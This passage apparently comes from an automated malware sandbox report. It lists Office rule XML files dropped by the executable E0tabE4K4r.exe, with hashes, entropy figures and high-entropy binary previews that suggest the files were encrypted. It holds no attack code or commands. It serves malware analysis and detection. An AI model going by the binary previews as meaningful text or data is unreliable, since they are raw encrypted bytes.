                                                                                                                                                  Preview:<?xml..>...'.O..ok...K...sdk.c.B:.`j..v...8.g..[G.....tG_.l..x.A....u.p`...{.?Q.kCw.j+....xv....An..6-....`..+f....T.E...p.},....Ut>AMG.,&32...G~.....r=Z..n.....R...@."...qq_...x....D.$^I.._.V|.\,H.0..Y.......d....21.dS.HB...I..Q..h-.YA..*.=..u..B..6[s.\.y..)..M..)../.Q.....j..J. 61.S.....N........L-h..S}5.....Z....ce.+4q..g...sK..4=....^\.p... .9....!....._..W..U4.G...f4n.Oo.L...O..(7..9..B...k+A..zc~..m.N_9P..&..d.)...h.kD.Z....-.?O....(..`..j.....qEh..D.H}.....4.:b.ar.v._... .........~$/.....@...Q...2..:.........~..m....].,T.....f.|.j.3f..J.:.l.V..|..m.m.?I...E.`Z.f....X%'..>.'2n.q.>...4...mb...i..^y...?%...TP..q..6..m..L...c...ef7..rME(.[..._P.V..c.q....j>>..V.....".p.U...$w6.....WF...|Qf..K.........)..x#...2X-.#.<...Z....C.....O.M;.Y.j8.....,|=.,~)+.{.>O...k.W....C.8D7...=.....Fo.h+m.^.....N.jm.....9."...F..Ns..B1.>~..f......Df..gQ~O....;.A.....g.......ez!......u...4@*.,.U..%.`....._.6.a?......,.Wo..#p\JG[......TX.......WN.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704000v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1715
                                                                                                                                                  Entropy (8bit):7.873841266790578
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/StU3VYZXrWdf3y24MhOmfa9LLVMyIOF1MeJfdLlD:6toV623ychOmi9HV5zNd
                                                                                                                                                  MD5:9F13DA9F544FDA1556BFDA23687B20FE
                                                                                                                                                  SHA1:1E5884DC61E937E5CC5EDE9BBD7D67C17866BDFD
                                                                                                                                                  SHA-256:4B7C6B94E45E39FA089A60971BBFD6A299209DCD06E1BCBBB25B30FEE254870E
                                                                                                                                                  SHA-512:286A2F9C43E413B7FF33872A19B2D5121F9A73DB1BDEFC1F5E0285CC787E39A43ACF897FDAF432ADE923EAD9454D0A7939DE86C0588AA840882E1224C5D57557
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml{...rKK...T..|,.:....9...>..0..xNo.[........3.?bC...................0!.!..6..Ew).m|....#.=..'...K>..j....._vA..L........Q.Nd..S;..L..c.OY.KM]".,........[.........'7...9....5..)..;$e..-"......CVN.`Q-^.......!.M..qgU...]"p..FVN.....I...y..HVS...b9#..Q..;4f.N.&.....#..@$..r..T..DQ3./....u....=....\6,...}V:.)....q`N.+^2.C.U.;..qm|.>.^o.,..+y_.g|.s/..e..d.q.3.~s.~..........e3...#....,.O..'=...z.>u.[.....V....... @.].9s.r.5.h..pJ#....NAm.......%%Oo#.V/..l.........u..9.........?]f.-OR....Z...G[....Z.jg.....jK..%.SU.uBX1.^.5c...$..9..{Q=E.}..<.L..5,...k.....gN..^5..fI.t.!.`..n...&4......iC{zY.l.$...=.....u.W._2....I....)d.(..di..5...BV.]...{5`.8V.Y...:.y1wa#..2y.....zv@.....?py.=."H...8K..P.....e.NK...HbS.{..L...k8..X.. N&#...K..pt.......`.v.8......Y....v..#O.@..G...4.8..y.J....z..1...MH/h.Si. .%.......[.Pi..6.c.._x..R.n.;^"Q.............d....X.:.....L|-...;[.....c..Z6n..MO........@1./....I*%.;...P.R........3.PI...IB.H|^C....}..;O..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704001v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1752
                                                                                                                                                  Entropy (8bit):7.880266406930877
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:zn8Z2H60sfzyq/Gp7UJbwwZkkc+ZT7blgKRVZz7D:znNH+fpiUJbZkkVBlrR
                                                                                                                                                  MD5:285A636D42FB3A96625DFABEE0DEF694
                                                                                                                                                  SHA1:4228D0FAEABFE1149D9C2DE9CEBACA0000AC93BD
                                                                                                                                                  SHA-256:80B8AA18380B2595EC98283BA7AACBB2B18C5A78222544102BA2B18DDC776AF9
                                                                                                                                                  SHA-512:BC24582FBBF62BAA64FBCDD8BCF7EB2B42721754EC119293C0A5F5B4DA7A33DF7D8177F6A40E0D1BF6F4CCF54538174072CEED27959754A0A4ABB966A5282287
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmleH..T.|yD....=..=..wl.EL.@.[.Q.b..d:T.....j.,Cs.._U..x|...V..&+........Bs.....7..M...........U}f=Qw....=.-.Y..8Lk.i-..t_.@G......Z.=....K.i...7HK..>.e.......+yF..C..b..U.S6.p....l..K..:^..eA...;.N.Uf6..x.........X....[P..=.(.9N).N)q.Z....6C..y..|K.......$X..l.....?.h..w....X..a.a....K..e./..B...~;..^T.C5.rn..%..yy%...r.*V.5....O.G."_....C..,.Ga@Wb.:..;.c.U..L..xI..e.$(x:....Cf.................TeP....d.^..Lo.H/...`....M.#.ly..\).....N`."T.........PE..4M.J.#k..D.........E..BU.`..R..]..x.....:...r.c.x......bc<.=&m....m9...J.....a...<.U.uE.5..q=.T.A.6&.....0<>...o.....1.s.....LbV..%D.4=1..{.T..l...P..[>...,N.......,..a..bH".H..fCFn[(8(.{..l......B.i..:.G.n2I/.......Z.Cf..Qd....#.k.-x=.3U.S...`..._.nsm..?5.k.c3.b..X....Y.of@...O.6Q.$.2.NK........8.yB.7.&75...s..{.9.^^..9r^-.$4.e....1..>....+...*....;.i_%....JKF)Y...D....Guw@q.]*=bW...g...3l.o."?...w.2.X..|i<<..2.<.. .>&....lJ|1...Zn~V..JCk..%..........}..[..l7.o.Lh....$.. .`.6.<..."_.#....`.I.%K.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704050v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1689
                                                                                                                                                  Entropy (8bit):7.885242692890384
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:gABbhS5oejtLuPVAp/LXy3/Il03+0mO9AFEw3BPuD:xhKNjqApLXsIqRmOoDPW
                                                                                                                                                  MD5:30B5802731D1F2E3B2719D7AD0969686
                                                                                                                                                  SHA1:AE49B7A2E3A62B7641BD441F99A56B8B9447EE13
                                                                                                                                                  SHA-256:C6120644F8D7E30608022285241B6BB571ED1406F5B1060205AEA4FE09308070
                                                                                                                                                  SHA-512:B386B47EB82AE58FDA2054E0EBBF1E5AA7E94EC4E2457A88BBCE119A0F00E7B98F9CEFCCCDAA218EEED7AE78051BE0FF701572E0D559FCAD0451224876B4908F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..mi.l...[9Bx.Qt..|.`WN IW...f.'-..X.7E..Y....T.......Q.6].....b3P..#u..v..+.(.W..U.A.|...?...c..........(:...l+<&`..u.A3..8.52.w...U.>.t.Sw5...:..P~X.;.`...8.+....t.!yK.F..$.rx.J~W.[..J..QD.......o&.Ai..I.XF.9.wb8..:u..T.....z.P...=..*.LhX.....^.o......F;.:.?n!.......e.te^........H./...?....t..N.[....iQ@....#..+..P..M......YF..-|..t.Y...;?%...7.6^.PL......y5.`.X."....Y._3..H...Qh..X$1.N1T...?.JD.D.3..i.....w..e.=:.6.oc.A...,.....xx./..Cd.m....u.a.n..+.qV..1..Gr.2U?..7.....[.*.....i..Kd,Q.)@..)>n.../.9.<v.'.v..'.LV....4f,ye...y`.e..iQX..u.yhXY.....0erQ..!...mg<.....CW.5MZ..Q..PJ..P....'!.8.K....u.8mC.?mq..o.J.-G#M...\...'x......e'.a.....;.%9l.P...f..[.b.rM..[.;#.^.....-...D....tP..g...kS.r..~N(.Ll..............*...W..j,.0........[...D.......V....I.....NGNo.{.....};....%...?O4.7S...9....&.......1.M...u....*cTK(..{.~0.X~...k@;......}*..#.w.8.BD..Q.8.@@._w+z.._..'+U..{k!...,<..#..L...DsYE.....4.......a.f@...=1.mA..t.".w.4

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704051v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1726
                                                                                                                                                  Entropy (8bit):7.878805064394515
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ApPAVxbKSdwU45YaK1mVLT2PbGGZwO6w4je0wBsUTDGD:gCbK/U45EmVab92O6/e3TDe
                                                                                                                                                  MD5:00B0E907CD6BA020C7FEE16D2AEB9808
                                                                                                                                                  SHA1:8ED1FD1A7C4068AB0A9E2520ED0B03963E4348C5
                                                                                                                                                  SHA-256:CD39CE2600CF7C73A80D1C010AFB6B482DA56953D9648C45A85DE979FFE23B48
                                                                                                                                                  SHA-512:DC4D1982D5F1977ADB0F46622CD08A91D64D1F8545D32CB52D281C683E4F4BCA21B2010E0BC2439C1CAC661191CF6F87272E1CD0B472C64FA337123F5E877723
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml=.-md]..Cj....d.G..ju.....A....$6;TA...)i...L..1}..U....zZ.U......w!.m..x.......d!....@...h3R03......Y:.5....|..2..[]..x.y....Vk.....;.|.Np;.P....",E..FV..h2...b}`....h.3Z4uC~A<B.@............{F8WRo..R.......Y[,....L....f@wX..S.Ju.hq..Y..M8.(.LZ..<..+e...6..w..w.....^.>...g..xP`............s.;........Y08..\5wBT...D0Gu.t........,Yb.u....t~.....*.)J...u.?.....]..L?).S.U..C.;.q...%@R7f.....t-.A..H..P!.aP.f....+...T..............bT+....~[d..'.z"...b.o;...I...`;Z ~..._*........5.;.B...A.k!.B......S....H..nL........\.Ow.PrJi.......-.1B.S...Z...........T.;..GSI......l..9."iqN.1.C...._"...m..w(..[lyR.....w.f.<....p]..B..#oj7....Go`.C....{.....(\%sU.......L..d....Aa.../.x?M\..(4....F&....._......im9).......]t..V.Y.mh...Ip<.\..>j.wcu.J...%t...m....yC.!.....S(t....$HH.....dY..... K.ig..k..L%.i..-.Sh...sJV..i._..Sd.."'.....k.:;..O4j.q..^)..p"..v..X1......._o..DG.j.?.....n..L.A..W....Nhhr..;...2..,x...#uF.....O.B4...t.^[...k.......U...H...?.K.".g.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704100v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1695
                                                                                                                                                  Entropy (8bit):7.882256070361239
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:2DeEUoDswrt0rQnH/SG2BnGgBbtPr/bzl+S37isGnHJwguD:ePH6Gqtrjp+IWsG21
                                                                                                                                                  MD5:548910FFAC656AFE86F6AB5D2613861F
                                                                                                                                                  SHA1:A4CF69022F163CF88AA10AD79014094EE8EC8517
                                                                                                                                                  SHA-256:794605ECB808341F461AB9B38A834DA4BCCDB3F5B9A5937F6EEED396EFE9F9E2
                                                                                                                                                  SHA-512:3E7E5D57699B18860C44494BF2BA0BD5C5F27C2960D87BB8AD757E8DFA3D18BE60E57EA047F3F237BBF7AEC26BDED0292C6316772464643E5C80DF4208839841
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.4.$../C...C......<..(.x...fqS..a..>...{..P..4. .VH.....o.p...s)ns..70@....Jc._..Z.C...".7.......-...K+.!.....=4.64.......!.....l.h.....V.`../....C%.<....;.L..4..*..71H...={....v...U.."..ka..!.X.....a......5....$.E.....|.....@..8c...._VZ...`R.V...3.qA.[.......f....Z..<2O.d...E.u(.*0p`........j.....:..i"d..-...b.......7..U..&.er..=.C.6...H...qr..m.4.Egd`)......?.Y..........r.."...(..)l?......EB./..Ok.......e.#.@..Rc....+......."..NP..ce....T.:ZF...'c.oN.t..UJ....V.=n.N.....T..Loc..........\......F..Qw..7..j.....v..(ae....\}DI.g.....u;|..UZuGV....T.,Y.,U..<$.gC...?Q.I...@....-.n.U...z=y....z...(..b.....p)....*.g.wG..d:.EJ..Z-Q+M.b4.?...Ad..w*...z..;.S.....8=.K0..*...~n`\F.OZ.$..#6...j.o{y.-?.>.#O.Y!.{..i.+G.~$....z........F..IH.f..8.l.9....&.+....g..5...P.^b....-.,.p&..7...+(...K...v..%...t.a=..Ico.lg~M...Y.e<Q..............B.G.8.....HT&.....,..'.\......Q}.........Cs.O.*E.........y.oj.+._.p.2.uh.=..Ic..>...U.L.....N..G..9I!....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704101v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1732
                                                                                                                                                  Entropy (8bit):7.890007262503924
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:FBgbstWH72rug+zx5eopzSDQsqWGe2PklgeHPmD:QbPH8D+zxLp+HjuPkfG
                                                                                                                                                  MD5:D90B83F3C6C3F4AB3E00655AFC5C551F
                                                                                                                                                  SHA1:55B77FFB6A4044709E54774A2A9CD182C2B5D4A2
                                                                                                                                                  SHA-256:ABFCD1109BB57B6879C1602044AF04DDBF0FB8F2B82F506A6D0079C291B0BDCF
                                                                                                                                                  SHA-512:1C96ABEC36ECC17A0BA1AA1147016F15A0C995318AF50370B98DA5739461DC1037B2BCC03D83D72BFEBCD8A9A6F0684BD7C6C0BFC9CDE0FE7C896094C8BB640F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml7.<..X.@.BA..!.V0.Dn.U$.$.Z.|.7..+`.(..g<..I..bs-...i.....K,.1./DU..*P.../Dv^........3-.<..%.,U.....Z....#4%6=.....S.G1.z"%~.......:...}....X4..H*px..jYh...K...VB;.....tau.|W...z.r..B.V..w].b(......Vr .q...7~.!d.7er..Vtj.i...yzA.Xo:...$..y-%.jT..0s...s.tc..{..7..\;@..#.'.....!Q;.....R.sC.W..s.c_v...^F...}}..z..7......3......J#.z`.....8.9j....W.*..........B.*..3....I.fa@[.(..g...S(.=.a./L ..!.M;.S..4....Jg.Q.-81..l.e..$:....u4..M..6.k....Y.R...,T..<g..j........{~,.x..P.|.7.....O..k..d.1.I..yJ.m.......-(.H...J....t!gj.)......u..y.....R...o....A....... ...".z.>............u.t......C ~Yh..S.....N.....`.-l'H%..^. ..t...)5.7.zub.;......KK....q..0.....?.i..5.q...<.,..o..Y.......lz...m.|l..O.....fM..1|X....$;..a...hWx.W.t.......(.2.....7..Y..(..+....v..kmy.F.3.y..1...o.UWM.es...p...]s.....$?...Vt...]T..'36.zUQ.H..+......I..c....3f.B...U....Z.l....'U.....H..[.%%O.,.).=..V.<.E...~,h.'r[..@l_<...2g.R...n....L+-.67....s...6....._C....@....SM.B

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704150v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1695
                                                                                                                                                  Entropy (8bit):7.8913130480744895
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:npkCxhlvgiGj7GGk8k+FrRWV4VlTZ0TGT6D:3hlgL2MJ1zTZ0x
                                                                                                                                                  MD5:76149F728843501502C4547E9B0F8AC2
                                                                                                                                                  SHA1:4EEA5B66691A827E02084E570784DB620B2D5B20
                                                                                                                                                  SHA-256:7F025C8EA5EE308E1D9810C98634596AEA80C0AB22146C80A8A1E4B930BD2C7F
                                                                                                                                                  SHA-512:BAC6A14806DFB319A504554F697F6E2FD02872E0BEFE6FC73B2652AF18A4F7009F275565392D950DBCC1E7CA398BE9E44355EC3F5A280FD0B32D4A866D0A0712
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.........:.G....,..!.....H.Q>.()0}.4.bs]..c..u.bm...l...I<..3=UXR@.....)....1...H..7X.o.+.-d."......1.t......e7...f......&.g%.H.....=....?..}.xJ.x....t>....H?'y...W...Ugp0..W.k.T+n..>...@h.t..`OU_..j...IR..;.$...H..0...OG5?!...L......8S..l._Z.........=.n_>.n.d.......%.8..e>.k.2..K[B.}.qx.[.t-..@R...v.=.V...{..u...:....I.j..w(.-}...V.t..D.fN.....l1.G.."z........l1...j.j...d.s..|.v..d..a..-N....8.7.UT..yw$......]X.{./..1U^.Js.W..4R6.A........n.b...I.o....|...O...q."..N~..V..... K.c?....8UV.dt.oz.+3.J!|..A..K...o.....].F.....!m.-....$......$s..._a).(.......y.DA'...x7...%(...:f)##..rP....@d?.y+..z.......|.h.{........ @./i.A.-.(@.el..P0/.sv.i....\..`.}I../D..h..s...c......A@u...q.<.5..^..7S*k.7."./.j....el.uO..L....=...AF.7R\...G..2f4....a3P.<"V.I.X.~.Z..........v.....bu.../....,.P.dG...5.......*.n....%...A....DN*k8d.E".x..O.vtV...g.P.w..K.AU9.D.k...........@PY.x.z.!.\x9....^.q0..~v2.....y3...4....]..M..(...dOE..+..W...o.M...r..4....s.\x...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704151v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1732
                                                                                                                                                  Entropy (8bit):7.900434070165822
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Jky0ObBEpzeWlrbc0MkrGEkAfYisekMkROdQJ6BcR3j3TAayIBfkEnHDd4vEDpLX:XbCI43McAM8R0OR3AayIJkEn5KCl9kwD
                                                                                                                                                  MD5:B208834AAE5E04705D9539E0B62B33C0
                                                                                                                                                  SHA1:2D7785C4A356F296E343EDC98C10E0505A1EA163
                                                                                                                                                  SHA-256:0D35F47342EA557ED0E43F234C64D7B0781F6718487E6C94E949E5B6BCF56854
                                                                                                                                                  SHA-512:C7C391B05E7623E9794599EC54EA9E52DFF4E32FC80138D1AC2685A87D05636F1CB1C2CF1530D0581E6E0D580F9A5B300CA7279238A721AB1C5C50DD3414EF32
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.N.3.)"...,.....]..E...m..E.h.;...,.4..)yj..2C...Y..O..-..g..... ......)@...!....N..-../).p.X..7..5/z....?..E..;.@.rZ.@?..wG.9........!.c..6..'..5@SNu[r...c.G..t...qY.3....u!a..D?(...g.....x.|W7H.y..?/}.........(...#E..P.....d..ar..$.._0.../.S..W..F#I)G.....=..k.U.I0...". ..y..]....kH..].....^.0>4.?.....Zf../.....w.6...._..$u.<..}.Q.d.Q.9.6......}.+m....E!3...w|r.n_..!7..*...k..;:.P...D.wR.b..v.....Y..eX..O.R.!.}..^..k..L.$.S......4n........2....-.:.9.....$"....w..u.h#..M8}..w...@....I.....(GAL....dh."KV...".+.]E.I.......5^.kz8..*.H.,Lc.j..<%.......R.....z..I...0.4V}D=.f.Gh.%...(.$m._]8....#......f.c.?..6....d...L...4U...6..it./.S...H...R.ij.o....du.x(.}..e.u/H.8...l..M4......GY,t0cJQ)..i.:..?..?>.....{.....?K.ZF.....".K.....m6.t.W..h.X.3K....F..a...>....$.....W...Q.:/.7%.Kg.H..]......$j`..7..b)r.....|cS...a.~4......13^...9....|...Zn.9.-&.!#e...f.......-!|......G.b.T.{..-.ebk.z.d.".w.?E..{c...grz=.}t..Jn..........x.|... .....%.W.%

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704200v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1713
                                                                                                                                                  Entropy (8bit):7.890224475192208
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:VHR0lXMbmnDphfpyLu1y/4Gqtfpp8LFgoyeD:kMb8DpTR12Fjj
                                                                                                                                                  MD5:80E45091DE360A8C0729DAEF92F6BF8D
                                                                                                                                                  SHA1:EA0D287BC4BDFDB392DCC8A03A8998C6B2CB09C0
                                                                                                                                                  SHA-256:22441E813AD42D91DACC9EA557433001A5404690B2D061ADE98B74440580F989
                                                                                                                                                  SHA-512:5B67BA8E3C98F80EBA3291D0FC6ECB5E662BD8C2288ECA7FB7DD691CFEC9B5F9072D3D8F90801640DE33360DFB7FEABBFEEBA5EEA24AD31ED9705B596BB50969
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlW.}..W...A:..&#.^D....\.%..aHW.$.]s......a..2..q`Pp....m...v................9.?.A....2.Hvu0(.?k.g1"...n...../I.N%(9...z.....ie&..Z....g.@.D"0.jl\'...<.g..*.zl~.0.LI)...2.L..r...M.>K...O.].f.xAZc~.. ,.\.Ms.Ul.]..#.d........1gT...l.ug.qzN.....[2.l..4..DrKJ....[.x8...0..E..H^#.w..iq.7.x....fY...H...]/[.\rvs..}.).#...V.."_B..{..wz..8..3.V.-...}(...3(i&H.y.E](...p.;.F.y....~.B.........&)...(^j/.<.9.......8.*..q*.4z.s..y....tOC.ix.....}r#"[!;..|.Y..........-h..X..N..x.G\...U.J%T.&e.#.,.S.Rz.TO@............L"..`.....1...M..j.....2...uO..Y..O..8..^..A...A.:.Q5.F..Ne.u"l..?.....G.B/*.Z.,@../............A..}.j.br..5aq..N25.WbJg.+..lG......b..O..b;l.9{....?......g.%G<M..\....h..C..^]H..qe.Y...mz.J...sV....._.._u.G.Qo.<.6....v~....D....?.......I!.r..{..'.6.e.]S....kb.m..R`.-d:.(.(.%...k...,....3.53=.....';.a.......G...SHW.#...(...m.lY.....1c....i.....>q=.....5.R.GP.H.}.j....G...4..tp.,.G..Vz:.....$Ru[..V....l.}..5.u..@?.-{#7A.....s.!.I...Ws.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704201v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1750
                                                                                                                                                  Entropy (8bit):7.883094398961087
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:PycDtIX5ZrTSwgpTM6IgkIMrEZRkihSAD:NDKX5FGlM6IDoFhl
                                                                                                                                                  MD5:0D7A5F676C7EB3756BF3EADD46FF0AB6
                                                                                                                                                  SHA1:74D5AEF700576D6D1C01AA167334EA5EBE459AD2
                                                                                                                                                  SHA-256:9F39A7A5ED648A300A7A9B9E9B0C7ED6A8256E34EF8AA85998E107AD37605623
                                                                                                                                                  SHA-512:5B6B95F694F48D0C1C2E2F640BA30E54C8CCA9FDE2B8E599AAF94734783227E8F762A61EC5E2F876F87B41E7C0F0EAD4C6B6497D22E11EB78CA98315A45235F2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlGj.!.d...-9d...qDl..$..P5.......2....z....0...yG{.Gh....1..3..MB..k...Sp4g6....z.6...h:4QS.......U.TH..t@#....W..%.+..;...Dr.~_u....f.4?.kd..Op.z^E.4W..-.d.e..+.Jc...%p|..J{.h..([y....L...qs.qo.V.........p~..#MZ.Z5....L.[B.a.b.PU....w........l.4.....3...&..O.C(-....j...wV..Q..E.N....f.!I&.]..`7.u..]r.M.5.QhW<.....0k*..e..~.Ly.....~..S........(;2.lvvCX..M..p.P.<g....B.b.b@3.q.d:X..s....}.....<w..5Iw..MY.L.NO.. y.p.......%.^.U.Em&..>O.v.7.ou....Au._GMy.sy.Oq.W.#9.u^.b....tO.wG.........,...M.......Sm...v....2.....)j....+.:.w...&.......e0...x!.l..o...`..+&7..6.....@.0...H..67..A.x...b..mt...(I.j.r.C.6H.a.>=..>.8.@..T#H..\%.g1.O.[<nG.......T.;\.9.. ..g@L..O3.07/.@.*#kF1cVO..EN....P3c.6...K?.0......b...U.%z..CL.s. d...KO..#4H.V...~xrA.......V....c.2..jV..@.........~....f*..*P.'.o../*..H........oj...,.>.m..Y...V2....W..3..D.[.A^.P.$X.....+.....]..F...~{.1el7Y......H@...g....8.j.....C.....ch.I.=..u..p..PN..}d.MfK.uPgj{v.D$Mr.......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule90401v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1583
                                                                                                                                                  Entropy (8bit):7.830327787561074
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:DihAcZkfgrwO1adldqrlND1gPlvHF29HD:DihAcZTT0HYRIPJF21
                                                                                                                                                  MD5:F81EFE71EBA3EBAEBFE04D4AC2FCA3F1
                                                                                                                                                  SHA1:2577C5B517B79039EB4D92ECFDF408144A2CCD50
                                                                                                                                                  SHA-256:BF51267E54608830BC875EA84F118FA4A9023A7CB2E43B974F71ED7A335B990A
                                                                                                                                                  SHA-512:A499733502968544A895E48317F83A34D2AF5C44A3085B3C0A0F70AF30EB38D4769B0554FFFB89A263E8A25CDDFC7B11319E2B09E96DC42D46361C97FE8B8BAC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..;.q.#.Ze.K.............. r...;.sm.7..)9..".........g.F.9..u..._.........;.d..E....d...*.{..B...6J.+LP8.w...k4..i.Z].7.V6;...V.=v....o .....jpP4....m.v9.\Mq.V..j7.O'vc..A.... ......,$..H0Sj.Mp.)C.v..9..u.F.......N..............?....tg.;D..ZC...6...w....*u1 ....h........".u...]..N.mMC.,....S.b.iq..f{].... ..?rx..QFwF.~...W....ML....8).X.h....> ...d...i...'..j.Y..*D...l....}N..Y..K+.$...3F.mV.Q.]..%Z.b.o..n.~R|:.....}e...|.FT..u...f.TRw..A.f.R.y9.....e....f...'.Pt.....K.g(_.gv..N.i.6J.fm...I....kM....@..y...>........d.J...Mqjt).M..f...d.....DA..F..b..Y.W.R.....U.....~8aOv.B?.K.'.s..Q..&....y..{..1.\9K<...g......(.cY.X.Q.."kw>.B:@.....'.....U.2.^.!..{8.....@ .hAs..#......;^......f.N5.....sYx.O5P.K.w...tI.../..Z"....i..Ul...d...I...om..~..sg..V...4.(P9.....;"..J......mTtC.<Z.<}.2j...}`cPI..a....qm...8.gq..4..cM...C.Pz..I....h..e...}..E.Z.j[<F........K..,.R[...h....5....K..^t._]D.f.Z..mxc.R....."...D......'m.k+..2.....[....j..7(

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):361051
                                                                                                                                                  Entropy (8bit):6.515224564721948
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:DEUDO2/S6n/3Siqh+5uEE9kaLa3S6yplg+NHI3pu8OZ42m1qDmvGLY+UemyDSu:RDgOKi0+5u5ze3gvoZw4B1wkWZL
                                                                                                                                                  MD5:5888625AD196CA7A564FD0A2D516D9FE
                                                                                                                                                  SHA1:4261705351BC43C3AE844006579C7B45D8384F59
                                                                                                                                                  SHA-256:7BD05482A76D5DBE0F322F46DB9936B400E42BBFE3E1F1310413A4C612969112
                                                                                                                                                  SHA-512:7C57BA500A22C2FDE0A744B46C44D9C3D81971D1145DF80DC5885DB523929B92D4E7EF3CA6FCAE0531E606AEDE00D6B0CC80BBFE37B3CBB2CF95D566D040737D
                                                                                                                                                  Malicious:false
